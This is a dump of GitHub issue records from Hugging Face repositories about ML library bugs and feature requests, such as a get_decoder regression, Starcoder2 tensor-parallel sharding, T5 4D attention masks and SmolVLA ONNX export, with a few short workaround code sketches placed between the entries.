below)\n\n### Reproduction\n\n```python\nfrom peft import LoraConfig # v0.17.1\nfrom transformers import HfArgumentParser # Built from source\n\np = HfArgumentParser(dataclass_types=LoraConfig) # fails\n```\n\n### Expected behavior\n\nI would expect LoraConfig to be supported by HfArgumentParser.\nAs I understand, this fails because HfArgumentParser does not support fields of type (`Optional[List[str], str]`).\n\nIs there a plan to support such fields?", "url": "https://github.com/huggingface/transformers/issues/40915", "state": "closed", "labels": [ "bug" ], "created_at": "2025-09-16T16:23:56Z", "updated_at": "2025-09-23T05:16:14Z", "comments": 5, "user": "romitjain" }, { "repo": "huggingface/diffusers", "number": 12338, "title": "`AutoencoderDC` bug with `pipe.enable_vae_slicing()` and decoding multiple images", "body": "### Describe the bug\n\nWhen using the Sana_Sprint_1.6B_1024px and the SANA1.5_4.8B_1024px models, I cannot enable VAE slicing when generating multiple images. I guess this issue will affect the rest of the Sana model and pipeline configurations because they all use the same `AutoencoderDC` model.\n\nI traced the issue to the following [line of code](https://github.com/huggingface/diffusers/blob/751e250f70cf446ae342c8a860d92f6a8b78261a/src/diffusers/models/autoencoders/autoencoder_dc.py#L620), and if I remove the `.sample` part the issue seems to be fixed.\n\nI intend to submit a PR for my proposed fix. 
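For the two `HfArgumentParser` reports above (transformers#40915 and peft#2798), a workaround sketch until stricter typing lands: parse a plain dataclass whose fields use simple types, then build the real `LoraConfig` from it. The field subset below is illustrative.

```python
from dataclasses import dataclass

from peft import LoraConfig
from transformers import HfArgumentParser


@dataclass
class LoraArgs:
    r: int = 8
    lora_alpha: int = 16
    lora_dropout: float = 0.05
    # comma-separated string instead of Union[List[str], str],
    # which is the field type the parser rejects
    target_modules: str = "q_proj,v_proj"


(args,) = HfArgumentParser(LoraArgs).parse_args_into_dataclasses()
lora_config = LoraConfig(
    r=args.r,
    lora_alpha=args.lora_alpha,
    lora_dropout=args.lora_dropout,
    target_modules=args.target_modules.split(","),
)
```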
Can I confirm that this is supposed to be the correct solution?\n\n### Reproduction\n\n```python\nfrom diffusers import SanaSprintPipeline\nimport torch\n\npipe = SanaSprintPipeline.from_pretrained(\"Efficient-Large-Model/Sana_Sprint_1.6B_1024px_diffusers\", text_encoder=text_encoder, torch_dtype=torch.bfloat16)\npipe.to(\"cuda\")\npipe.enable_vae_slicing()\n\nprompt = \"A girl\"\nnum_images_per_prompt = 8\noutput = pipe(\n\tprompt=prompt,\n\theight=1024,\n\twidth=1024,\n\tnum_inference_steps=2,\n\tnum_images_per_prompt=num_images_per_prompt,\n\tintermediate_timesteps=1.3,\n\tmax_timesteps=1.56830,\n\ttimesteps=None\n).images\n```\n\n### Logs\n\n```shell\nTraceback (most recent call last):\n File \"F:\\AI setups\\Diffusers\\scripts\\inference sana-sprint.py\", line 24, in \n output = pipe(\n ^^^^^\n File \"F:\\AI setups\\Diffusers\\diffusers-venv\\Lib\\site-packages\\torch\\utils\\_contextlib.py\", line 116, in decorate_context\n return func(*args, **kwargs)\n ^^^^^^^^^^^^^^^^^^^^^\n File \"F:\\AI setups\\Diffusers\\diffusers-venv\\Lib\\site-packages\\diffusers\\pipelines\\sana\\pipeline_sana_sprint.py\", line 874, in __call__\n image = self.vae.decode(latents / self.vae.config.scaling_factor, return_dict=False)[0]\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"F:\\AI setups\\Diffusers\\diffusers-venv\\Lib\\site-packages\\diffusers\\utils\\accelerate_utils.py\", line 46, in wrapper\n return method(self, *args, **kwargs)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"F:\\AI setups\\Diffusers\\diffusers-venv\\Lib\\site-packages\\diffusers\\models\\autoencoders\\autoencoder_dc.py\", line 620, in decode\n decoded_slices = [self._decode(z_slice).sample for z_slice in z.split(1)]\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"F:\\AI setups\\Diffusers\\diffusers-venv\\Lib\\site-packages\\diffusers\\models\\autoencoders\\autoencoder_dc.py\", line 620, in \n decoded_slices = [self._decode(z_slice).sample for z_slice in z.split(1)]\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^\nAttributeError: 'Tensor' object has no attribute 'sample'\n```\n\n### System Info\n\n- \ud83e\udd17 Diffusers version: 0.36.0.dev0\n- Platform: Windows-10-10.0.26100-SP0\n- Running on Google Colab?: No\n- Python version: 3.11.9\n- PyTorch version (GPU?): 2.7.1+cu128 (True)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Huggingface_hub version: 0.34.4\n- Transformers version: 4.55.0\n- Accelerate version: 1.10.0\n- PEFT version: 0.17.0\n- Bitsandbytes version: 0.47.0\n- Safetensors version: 0.6.2\n- xFormers version: 0.0.31.post1\n- Accelerator: NVIDIA GeForce RTX 4090, 24564 MiB\n- Using GPU in script?: No\n- Using distributed or parallel set-up in script?: No\n\n### Who can help?\n\n@yiyixuxu @DN6 ", "url": "https://github.com/huggingface/diffusers/issues/12338", "state": "closed", "labels": [ "bug" ], "created_at": "2025-09-16T12:23:29Z", "updated_at": "2025-09-22T06:55:35Z", "comments": 0, "user": "mingyi456" }, { "repo": "huggingface/optimum", "number": 2355, "title": "Support exporting text-ranking for BERT models", "body": "### Feature request\n\nCurrently, `optimum-cli export onnx --model cross-encoder/ms-marco-MiniLM-L-12-v2 cross-encoder--ms-marco-MiniLM-L-12-v2-onnx` says:\n\n```\nValueError: Asked to export a bert model for the task text-ranking (auto-detected), but the Optimum ONNX exporter only supports the tasks feature-extraction, fill-mask, multiple-choice, question-answering, text-classification, 
token-classification for bert. Please use a supported task. Please open an issue at https://github.com/huggingface/optimum/issues if you would like the task text-ranking to be supported in the ONNX export for bert.\n```\n\n### Motivation\n\nI'm working on a tool that I intend to distribute to others, for example via `brew install`. It's difficult to package and ship Python, and I also want to prioritize the speed of many filesystem and related operations, so I'm writing in Rust, using candle.\n\nIt can be a lot of work to implement every single model type by hand in candle. candle-transformers doesn't implement BertForSequenceClassification. Moreover, as model architectures change, I don't want to have to implement each one. It's great to be able to have the entire computation graph stored as data, as in ONNX.\n\n### Your contribution\n\nI'm willing to take a stab at this! If you think it would be helpful, and if you could give a couple of pointers on how to start!", "url": "https://github.com/huggingface/optimum/issues/2355", "state": "closed", "labels": [ "Stale" ], "created_at": "2025-09-15T21:23:35Z", "updated_at": "2025-10-21T02:10:29Z", "comments": 1, "user": "kshitijl" }, { "repo": "huggingface/lerobot", "number": 1923, "title": "Deploying SmolVLA with a simulator", "body": "Has anyone been able to deploy the SmolVLA model to control, say, the SO-100 in a simulator like IsaacSim? \nEven if the fine-tuning reliably converges, the observed performance in the simulator seems erratic. Do we apply the predicted actions from SmolVLA directly to the Articulation controller as positions? ", "url": "https://github.com/huggingface/lerobot/issues/1923", "state": "closed", "labels": [ "question", "policies", "simulation" ], "created_at": "2025-09-12T21:06:40Z", "updated_at": "2025-12-11T22:07:02Z", "user": "aditya1709" }, { "repo": "huggingface/swift-transformers", "number": 237, "title": "Please help. Seeing issues with Hub when integrating", "body": "Hello, I'm trying to integrate WhisperKit via https://github.com/argmaxinc/WhisperKit/blob/main/Package.swift but that seems to bring in [swift-transformers](https://github.com/huggingface/swift-transformers) and Hub. I'm seeing the issues below:\n\nHub.package.swiftinterface:34:32: warning: 'BinaryDistinctCharacter' is not a member type of struct 'Hub.Hub'\n23:54:09 32 | public init(_ str: Foundation.NSString)\n23:54:09 33 | public init(_ str: Swift.String)\n23:54:09 34 | public init(_ character: Hub.BinaryDistinctCharacter)\n23:54:09 | `- warning: 'BinaryDistinctCharacter' is not a member type of struct 'Hub.Hub'\n23:54:09 35 | public init(_ characters: [Hub.BinaryDistinctCharacter])\n23:54:09 36 | public init(stringLiteral value: Swift.String\n\nI'm on Xcode 16.4 and using Swift 5.10. Please help!! Thanks in advance! 
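For the optimum#2355 export error above, a possible interim workaround: cross-encoder rankers are architecturally `BertForSequenceClassification` models, so forcing the already-supported text-classification task may unblock the export while native text-ranking support lands. Unverified that the exported scores match the text-ranking semantics exactly.

```python
from optimum.exporters.onnx import main_export

# Override the auto-detected "text-ranking" task with a supported one.
main_export(
    "cross-encoder/ms-marco-MiniLM-L-12-v2",
    output="ms-marco-minilm-onnx",
    task="text-classification",
)
```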
", "url": "https://github.com/huggingface/swift-transformers/issues/237", "state": "closed", "labels": [ "question" ], "created_at": "2025-09-12T17:06:28Z", "updated_at": "2025-09-17T15:36:52Z", "user": "rpatnayakuni22" }, { "repo": "huggingface/transformers", "number": 40815, "title": "get_decoder feature regression in 4.56.0", "body": "### System Info\n\nIn the release of transformers v4.56.0, this PR https://github.com/huggingface/transformers/pull/39509 introduced a refactor of the public `get_decoder` method which previously existed on modes by moving it to the PreTrainedModel class.\n\nUnfortunately this introduced a significant behavior change in that `*CausalForLM` models no longer have the same behavior of having `get_decoder()` return the underlying base model.\n\nFor example a `MistralForCausalLM` model named `model` returns `None` when `model.get_decoder()` is called. \n\nThe logic for why is occurring is obvious when looking at the offending PR:\n\n```python\ndef get_decoder(self):\n \"\"\"\n Best-effort lookup of the *decoder* module.\n Order of attempts (covers ~85 % of current usages):\n 1. `self.decoder`\n 2. `self.model` (many wrappers store the decoder here)\n 3. `self.model.get_decoder()` (nested wrappers)\n 4. fallback: raise for the few exotic models that need a bespoke rule\n \"\"\"\n if hasattr(self, \"decoder\"):\n return self.decoder\n\n if hasattr(self, \"model\"):\n inner = self.model\n if hasattr(inner, \"get_decoder\"):\n return inner.get_decoder()\n return inner\n\n return None\n```\n\nIn these cases the `if hasattr(self, \"model\"):` conditional block is entered, and the underlying model has a `get_decoder` method, as it is a `PreTrainedModel`, as all transformers models are. This block will always be entered. At this point we are now in the decoder itself calling its `get_decoder` method. The decoder has no decoder or model attribute, so the function returns `None`, which is the passed to the parent caller.\n\nThere are a couple of ways this could be fixed, but I don't know what their current impact would be on other parts of the code. I may open a PR, but I am quite busy at the moment. 
@molbap @ArthurZucker since you were the authors and reviewers here, do you mind taking another look at this?\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nUse `get_decoder` on say a `MistralForCausalLM` model.\n\n### Expected behavior\n\nThe underlying `model` attribute should be returned for `*ForCausalLM` models, not None, as these models are decoder only models by transformers convention.", "url": "https://github.com/huggingface/transformers/issues/40815", "state": "closed", "labels": [ "bug" ], "created_at": "2025-09-11T09:25:12Z", "updated_at": "2025-09-16T08:57:14Z", "comments": 4, "user": "KyleMylonakisProtopia" }, { "repo": "huggingface/transformers", "number": 40813, "title": "Incorrect sharding configuration for Starcoder2 model", "body": "### System Info\n\nTransformers main branch (commit [0f1b128](https://github.com/huggingface/transformers/commit/0f1b128d3359a26bd18be99c26d7f04fb3cba914) )\n- `transformers` version: 4.57.0.dev0\n- Platform: Linux-5.15.0-1030-nvidia-x86_64-with-glibc2.39\n- Python version: 3.12.3\n- Huggingface_hub version: 0.34.4\n- Safetensors version: 0.5.3\n- Accelerate version: 1.10.1\n- Accelerate config: not found\n- DeepSpeed version: not installed\n- PyTorch version (accelerator?): 2.8.0a0+5228986c39.nv25.06 (CUDA)\n- Tensorflow version (GPU?): not installed (NA)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Using distributed or parallel set-up in script?: tensor-parallel\n- Using GPU in script?: yes\n- GPU type: NVIDIA H100 80GB HBM3\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [x] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nTunning TP inference on `bigcode/starcoder2-7b` throws an error with incorrect tensor shapes due to `base_model_tp_plan` misconfiguration.\n\n`demo.py`:\n```\nimport os\nimport torch\nfrom transformers import AutoModelForCausalLM, AutoTokenizer\n\nmodel_id = \"bigcode/starcoder2-7b\"\nmodel = AutoModelForCausalLM.from_pretrained(model_id, tp_plan=\"auto\")\n\nmodel._tp_plan['model.layers.*.mlp.c_proj'] = 'rowwise'\nprint(f\"TP plan: {model._tp_plan}, class: {type(model._tp_plan)}\")\n\ntokenizer = AutoTokenizer.from_pretrained(model_id)\nprompt = \"Can I help\"\ninputs = tokenizer(prompt, return_tensors=\"pt\").input_ids.to(model.device)\n\n# distributed run\noutputs = model(inputs)\n\n# print the output\nprint(outputs)\n```\nrun with\n```\ntorchrun --nproc_per_node=2 demo.py\n```\n\nThe correct `base_model_tp_plan` should replace:\n```\n['model.layers.*.mlp.c_proj'] = 'colwise'\n```\nwith \n```\n['model.layers.*.mlp.c_proj'] = 'rowwise'\n```\n\n### Expected behavior\n\nThrows:\n```\n(...)\n[rank0]: File \"/lustre/fs1/portfolios/coreai/users/gkwasniewski/hf-repo/transformers/src/transformers/models/starcoder2/modeling_starcoder2.py\", line 65, in forward\n[rank0]: hidden_states = self.c_proj(hidden_states)\n[rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank0]: File \"/usr/local/lib/python3.12/dist-packages/torch/nn/modules/module.py\", line 1751, in _wrapped_call_impl\n[rank0]: return self._call_impl(*args, 
**kwargs)\n[rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank0]: File \"/usr/local/lib/python3.12/dist-packages/torch/nn/modules/module.py\", line 1857, in _call_impl\n[rank0]: return inner()\n[rank0]: ^^^^^^^\n[rank0]: File \"/usr/local/lib/python3.12/dist-packages/torch/nn/modules/module.py\", line 1805, in inner\n[rank0]: result = forward_call(*args, **kwargs)\n[rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank0]: File \"/usr/local/lib/python3.12/dist-packages/torch/nn/modules/linear.py\", line 125, in forward\n[rank0]: return F.linear(input, self.weight, self.bias)\n[rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank0]: File \"/usr/local/lib/python3.12/dist-packages/torch/_compile.py\", line 51, in inner\n[rank0]: return disable_fn(*args, **kwargs)\n[rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank0]: File \"/usr/local/lib/python3.12/dist-packages/torch/_dynamo/eval_frame.py\", line 850, in _fn\n[rank0]: return fn(*args, **kwargs)\n[rank0]: ^^^^^^^^^^^^^^^^^^^\n[rank0]: File \"/usr/local/lib/python3.12/dist-packages/torch/distributed/tensor/_api.py\", line 350, in __torch_dispatch__\n[rank0]: return DTensor._op_dispatcher.dispatch(\n[rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank0]: File \"/usr/local/lib/python3.12/dist-packages/torch/distributed/tensor/_dispatch.py\", line 160, in dispatch\n[rank0]: self.sharding_propagator.propagate(op_info)\n[rank0]: File \"/usr/local/lib/python3.12/dist-packages/torch/distributed/tensor/_sharding_prop.py\", line 266, in propagate\n[rank0]: OutputSharding, self.propagate_op_sharding(op_info.schema)\n[rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank0]: File \"/usr/local/lib/python3.12/dist-packages/torch/distributed/tensor/_sharding_prop.py\", line 45, in __call__\n[rank0]: return self.cache(*args, **kwargs)\n[rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank0]: File \"/usr/local/lib/python3.12/dist-packages/torch/distributed/tensor/_sharding_prop.py\", line 279, in propagate_op_sharding_non_cached\n[rank0]: out_tensor_meta = self._propagate_tensor_meta_non_cached(op_schema)\n[rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank0]: File \"/usr/local/lib/python3.12/dist-packages/torch/distributed/tensor/_sharding_prop.py\", line 126, in _propagate_tensor_meta_non_cached\n[rank0]: fake_out = op_schema.op(*fake_args, **fake_kwargs)\n[rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[ra", "url": "https://github.com/huggingface/transformers/issues/40813", "state": "closed", "labels": [ "bug" ], "created_at": "2025-09-11T09:02:53Z", "updated_at": "2025-09-15T08:46:33Z", "comments": 1, "user": "greg-kwasniewski1" }, { "repo": "huggingface/lerobot", "number": 1911, "title": "How to avoid re-write cache data from pyarrow into parquet everytime?", "body": "Hi Authors,\n\nWhen using lerobot dataset in a pytorch dataloader, lerobot dataset will write a huge cache data which is converted from pyarrow to Apache Parquet. How to avoid that?\n\nI can think of two options:\n\n1. Avoid converting to Parquet data and directly read from parquet data. But this may loose reading performance.\n2. Can we instead store the Parquet data? 
\n\nThanks.\n\nSonglin", "url": "https://github.com/huggingface/lerobot/issues/1911", "state": "open", "labels": [], "created_at": "2025-09-10T22:19:25Z", "updated_at": "2025-09-10T22:19:25Z", "user": "songlinwei-we" }, { "repo": "huggingface/transformers", "number": 40767, "title": "3D Object Detection Models", "body": "### Model description\n\nHi together,\nis there a reason, or any other thread, where 3D models like those in mmdet3d are discussed for implementation? I have not found any discussion.\nThanks\n\n### Open source status\n\n- [ ] The model implementation is available\n- [ ] The model weights are available\n\n### Provide useful links for the implementation\n\nBEVFormer: \nhttps://github.com/fundamentalvision/BEVFormer", "url": "https://github.com/huggingface/transformers/issues/40767", "state": "open", "labels": [ "New model" ], "created_at": "2025-09-09T13:16:33Z", "updated_at": "2025-11-13T21:18:40Z", "comments": 3, "user": "SeucheAchat9115" }, { "repo": "huggingface/lerobot", "number": 1899, "title": "Has anyone tried to export the smolvla as onnx model for deployment?", "body": "I have tested the trained smolvla model on my PC and it works. I now want to deploy smolvla on our target board. \n\nI looked into the model structure of smolvla; for the vision-encoder and language-embedding parts I can refer to smolvlm and export them as two ONNX models. I think the robot state embedding also needs to be considered for export as a new ONNX model.\n\nFor the most important part of smolvla inference, I met several issues and have no good idea how to export it as an ONNX model.\n\nHas anyone tried and successfully exported smolvla as ONNX models for deployment? Thanks!", "url": "https://github.com/huggingface/lerobot/issues/1899", "state": "open", "labels": [ "question", "policies", "performance" ], "created_at": "2025-09-09T10:41:14Z", "updated_at": "2025-10-07T20:50:12Z", "user": "TankerLee" }, { "repo": "huggingface/huggingface_hub", "number": 3339, "title": "What is the best replacement of HfFileSystem.glob with HfApi", "body": "In some of our code, we were using something like\n\n```python\nhf_fs = HfFileSystem()\nfiles = hf_fs.glob('my/repo/*/model.onnx')\n```\n\nBut I found that HfFileSystem is much less stable than HfApi, especially in edge cases (e.g. an unstable network).\n\nSo what is the best replacement of HfFileSystem.glob with HfApi? 
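A straightforward replacement sketch for the huggingface_hub#3339 question above: list the repo's files once with `HfApi`, then glob client-side. Note the pattern drops the repo-id prefix, since `list_repo_files` returns repo-relative paths; the repo id is a placeholder.

```python
from fnmatch import fnmatch

from huggingface_hub import HfApi

api = HfApi()
files = api.list_repo_files("my/repo")  # placeholder repo id
matches = [f for f in files if fnmatch(f, "*/model.onnx")]
print(matches)
```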
Any suggestions?", "url": "https://github.com/huggingface/huggingface_hub/issues/3339", "state": "closed", "labels": [], "created_at": "2025-09-09T09:02:07Z", "updated_at": "2025-09-15T09:12:04Z", "user": "narugo1992" }, { "repo": "huggingface/transformers", "number": 40754, "title": "Potentially incorrect value assignment of Llama4TextModel's output in Llama4ForCausalLM's output?", "body": "### System Info\n\n**System Info** \n- `transformers` version: 4.55.4\n- Platform: Linux-6.15.9-201.fc42.x86_64-x86_64-with-glibc2.41\n- Python version: 3.13.5\n- Huggingface_hub version: 0.34.4\n- Safetensors version: 0.6.2\n- Accelerate version: 1.10.1\n- Accelerate config: \tnot found\n- DeepSpeed version: not installed\n- PyTorch version (accelerator?): 2.8.0+cu128 (CUDA)\n- Tensorflow version (GPU?): not installed (NA)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Using distributed or parallel set-up in script?: \n- Using GPU in script?: \n- GPU type: NVIDIA RTX A6000\n\n### Who can help?\n\n@ArthurZucker \n@amyeroberts \n@qubvel \n\n### Information\n\n- [x] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\n**Task Detail**\nObtaining hidden_states from the outputs of Llama4ForCausalLM\n\n**Problem**\nIn the source code [modeling_llama4.py](https://github.com/huggingface/transformers/blob/v4.55.4/src/transformers/models/llama4/modeling_llama4.py), the outputs of Llama4ForCausalLM contains a *hidden_states* (See [line 642](https://github.com/huggingface/transformers/blob/d79b2d981f28b2730d402244ac3c2e9a8c054eee/src/transformers/models/llama4/modeling_llama4.py#L642)), which is assigned with *outputs.hidden_states*. Here, the *outputs* is the output of Llama4TextModel (See [line 619](https://github.com/huggingface/transformers/blob/d79b2d981f28b2730d402244ac3c2e9a8c054eee/src/transformers/models/llama4/modeling_llama4.py#L619C9-L619C16)). 
However, the output of Llama4TextModel consists of a *last_hidden_state* (assigned the value of *hidden_states*) and a *past_key_values*, but no *hidden_states* (See [line 554-557](https://github.com/huggingface/transformers/blob/d79b2d981f28b2730d402244ac3c2e9a8c054eee/src/transformers/models/llama4/modeling_llama4.py#L554-L557)).\n\nThus, I'm wondering if there is either a typo in [line 642](https://github.com/huggingface/transformers/blob/d79b2d981f28b2730d402244ac3c2e9a8c054eee/src/transformers/models/llama4/modeling_llama4.py#L642) where the *hidden_states=outputs.hidden_states* should be replaced by *hidden_states=outputs.last_hidden_state*, or a typo in [line 555](https://github.com/huggingface/transformers/blob/d79b2d981f28b2730d402244ac3c2e9a8c054eee/src/transformers/models/llama4/modeling_llama4.py#L555C13-L555C45) where the *last_hidden_state=hidden_states* should be replaced by *hidden_states=hidden_states*?\n\nThank you for your patience!\n\n### Expected behavior\n\nAn explanation or a correction of the source code in [modeling_llama4.py](https://github.com/huggingface/transformers/blob/v4.55.4/src/transformers/models/llama4/modeling_llama4.py)", "url": "https://github.com/huggingface/transformers/issues/40754", "state": "closed", "labels": [ "Usage", "bug" ], "created_at": "2025-09-08T12:31:39Z", "updated_at": "2025-09-16T19:25:03Z", "comments": 3, "user": "st143575" }, { "repo": "huggingface/transformers", "number": 40752, "title": "How to extract attention weights for the first generated token?", "body": "**Title:** Request for clarification: How to extract attention weights for the first generated token?\n\n**Description:**\n\nHi, I'm trying to extract the attention weights **of the first generated token** (i.e., the first new token produced by `generate()`) with respect to the input prompt. 
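For the Llama4 wiring question above (transformers#40754), a minimal check you can run on your own build: per-layer states are only attached when requested, so on an affected version this shows whether `hidden_states` comes back populated or `None`. The checkpoint id is a placeholder for any Llama-4 causal LM.

```python
import torch
from transformers import AutoModelForCausalLM, AutoTokenizer

model_id = "meta-llama/Llama-4-Scout-17B-16E"  # placeholder checkpoint id
tok = AutoTokenizer.from_pretrained(model_id)
model = AutoModelForCausalLM.from_pretrained(model_id, torch_dtype=torch.bfloat16)

out = model(**tok("Hello", return_tensors="pt"), output_hidden_states=True)
# On an affected build this may print NoneType despite output_hidden_states=True;
# out.logits is unaffected either way.
print(type(out.hidden_states))
```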
However, I'm observing inconsistent behavior in the shape of `attentions` returned by `model.generate(..., output_attentions=True)`.\n\nHere's what I found:\n\n- For `step 0` (the first generation step), `attentions[0][layer].shape` is `(batch, heads, seq_len, seq_len)` \u2014 e.g., `[1, 16, 1178, 1178]`, where `seq_len` equals the input prompt length.\n- This appears to be the **full self-attention matrix of the prompt context**, not the attention of the newly generated token.\n- Starting from `step 1`, the shape becomes `(batch, heads, 1, ctx_len)`, which correctly represents the attention of a single generated token.\n\n**Question:**\n- Is there a way to directly extract the attention weights **from the first generated token** (i.e., the query of the first new token attending to the prompt keys)?\n- Or is the intended behavior to use the last position of the context attention (i.e., `attentions[0][layer][..., -1, :]`) as a proxy for the generation decision?\n\n**Use Case:**\nI want to interpret which parts of the input prompt the model attends to when generating the first output token, for interpretability and analysis purposes.\n\n**Environment:**\n- Transformers version: [4.51.3]\n- Model: [Qwen3]\n- Code snippet:\n ```python\n outputs = model.generate(\n input_ids,\n output_attentions=True,\n return_dict_in_generate=True\n )\n # outputs.attentions[0][layer] has shape (1, 16, 1178, 1178)", "url": "https://github.com/huggingface/transformers/issues/40752", "state": "closed", "labels": [], "created_at": "2025-09-08T09:53:16Z", "updated_at": "2025-09-08T11:41:22Z", "user": "VincentLHH" }, { "repo": "huggingface/transformers.js", "number": 1407, "title": "Expected time to load a super-resolution model locally", "body": "### Question\n\nLoading an image super-resolution model locally can take more than 10 seconds on my MacBook Pro (M1 Max). Is this expected behavior?\n```javascript\nenv.allowRemoteModels = false;\nenv.allowLocalModels = true;\nenv.backends.onnx.wasm.wasmPaths = `/wasm/`;\n\nconst upscaler = ref(null);\nonMounted(async () => {\n upscaler.value = await pipeline('image-to-image', 'Xenova/swin2SR-realworld-sr-x4-64-bsrgan-psnr', {\n dtype: 'fp32',\n device: 'webgpu',\n })\n});\n```\nWarnings observed during the model loading:\n```\nort-wasm-simd-threaded.jsep.mjs:100 \n2025-09-08 13:58:52.881399 [W:onnxruntime:, session_state.cc:1280 VerifyEachNodeIsAssignedToAnEp] Some nodes were not assigned to the preferred execution providers which may or may not have an negative impact on performance. e.g. ORT explicitly assigns shape related ops to CPU to improve perf.\n\nort-wasm-simd-threaded.jsep.mjs:100 \n2025-09-08 13:58:52.882499 [W:onnxruntime:, session_state.cc:1282 VerifyEachNodeIsAssignedToAnEp] Rerunning with verbose output on a non-minimal build will show node assignments.\n```\n\n### System Info\nnpm: @huggingface/transformers@3.7.2\nOS: macOS Sequoia 15.6.1\nmodel: Xenova/swin2SR-realworld-sr-x4-64-bsrgan-psnr", "url": "https://github.com/huggingface/transformers.js/issues/1407", "state": "closed", "labels": [ "question" ], "created_at": "2025-09-08T06:26:49Z", "updated_at": "2025-09-30T19:22:34Z", "user": "ymtoo" }, { "repo": "huggingface/lerobot", "number": 1891, "title": "How to checkout a commit id?", "body": "The underlying datasets library supports a \"revision\" flag. 
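For example, with plain huggingface_hub I can pin a dataset to a commit like this (sketch; the repo id and sha are placeholders):\n\n```python\nfrom huggingface_hub import snapshot_download\n\n# download the dataset files exactly as they were at a given commit\nsnapshot_download(\n    repo_id=\"lerobot/pusht\",\n    repo_type=\"dataset\",\n    revision=\"<commit-sha>\",  # placeholder: any commit id, branch, or tag\n)\n```\n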
Does lerobot?", "url": "https://github.com/huggingface/lerobot/issues/1891", "state": "closed", "labels": [], "created_at": "2025-09-08T04:39:37Z", "updated_at": "2025-09-10T22:53:18Z", "user": "richardrl" }, { "repo": "huggingface/transformers", "number": 40743, "title": "Support for 4D attention mask for T5", "body": "### Feature request\n\nCurrently, T5 cannot take 4D attention masks (batch_size, num_heads, seq_len, seq_len) as inputs. Passing a 4D attention_mask and a 4D decoder_attention_mask like so leads to a shape-related exception :\n\n```python\nimport torch\nfrom transformers import AutoTokenizer, T5ForConditionalGeneration\n\ntokenizer = AutoTokenizer.from_pretrained(\"google-t5/t5-small\")\nmodel = T5ForConditionalGeneration.from_pretrained(\"google-t5/t5-small\")\n\ninput_ids = tokenizer(\"Where is\", return_tensors=\"pt\").input_ids\ndecoder_input_ids = tokenizer(\"\", return_tensors=\"pt\").input_ids\n\nbatch_size, seq_len = input_ids.shape\ntgt_len = decoder_input_ids.shape[1]\nnum_heads = model.config.num_heads\n\nattention_mask = torch.ones(batch_size, num_heads, seq_len, seq_len)\ndecoder_attention_mask = torch.ones(batch_size, num_heads, tgt_len, tgt_len).tril(0)\n\nmodel(\n input_ids,\n decoder_input_ids=decoder_input_ids,\n attention_mask=attention_mask,\n decoder_attention_mask=decoder_attention_mask,\n)\n```\n\nOne of the problems in the current code is in the handling of the cross-attention mask. Currently, it is created using the 1D encoder attention mask when supplied. However, in the case of a 4D mask, it seems unclear how to correctly use the encoder mask: therefore, the best solution might be to introduce a new 4D mask argument `cross_attention_mask` of shape (batch_size, num_heads, tgt_len, seq_len)`. This lets the user controls all attention masks if necessary.\n\n### Motivation\n\n4D masks are useful for many purposes, as outlined by #27539 and [this blog post](https://huggingface.co/blog/poedator/4d-masks), but not all models support them.\n\n### Your contribution\n\nI propose to fix the code to handle 4D attention masks, and to add a new `cross_attention_mask` argument to add the possibility to control the cross attention mask manually. I wrote a version of that code in [this fork](https://github.com/Aethor/transformers/tree/t5-4d-attention-mask).\n\nI'm happy to create a PR with my code, but:\n\n1. This is my first transformers contribution, I need help with some things such as handling the \"Copy\" code duplication mechanism of transformers. Should other similar models with copied functions from T5 be changed as well?\n2. Although I wrote a [first test with trivial masks](https://github.com/Aethor/transformers/blob/22dc62edbdbc3f2afeb90a31c75047711c1afc5c/tests/models/t5/test_modeling_t5.py#L1876), I am not entirely sure how to test this\n3. I want to be sure that adding the new `cross_attention` mask parameter is the right way to do this and will be approved", "url": "https://github.com/huggingface/transformers/issues/40743", "state": "open", "labels": [ "Feature request" ], "created_at": "2025-09-07T07:18:05Z", "updated_at": "2025-09-09T11:43:33Z", "comments": 5, "user": "Aethor" }, { "repo": "huggingface/lerobot", "number": 1882, "title": "Pretrain - Code for pretraining smolvla", "body": "## Guidance on Replicating the Pre-training Process with Community Datasets\n\n\nHi team,\n\nFirst off, thank you for the fantastic work on SmolVLA and for open-sourcing the model and code. 
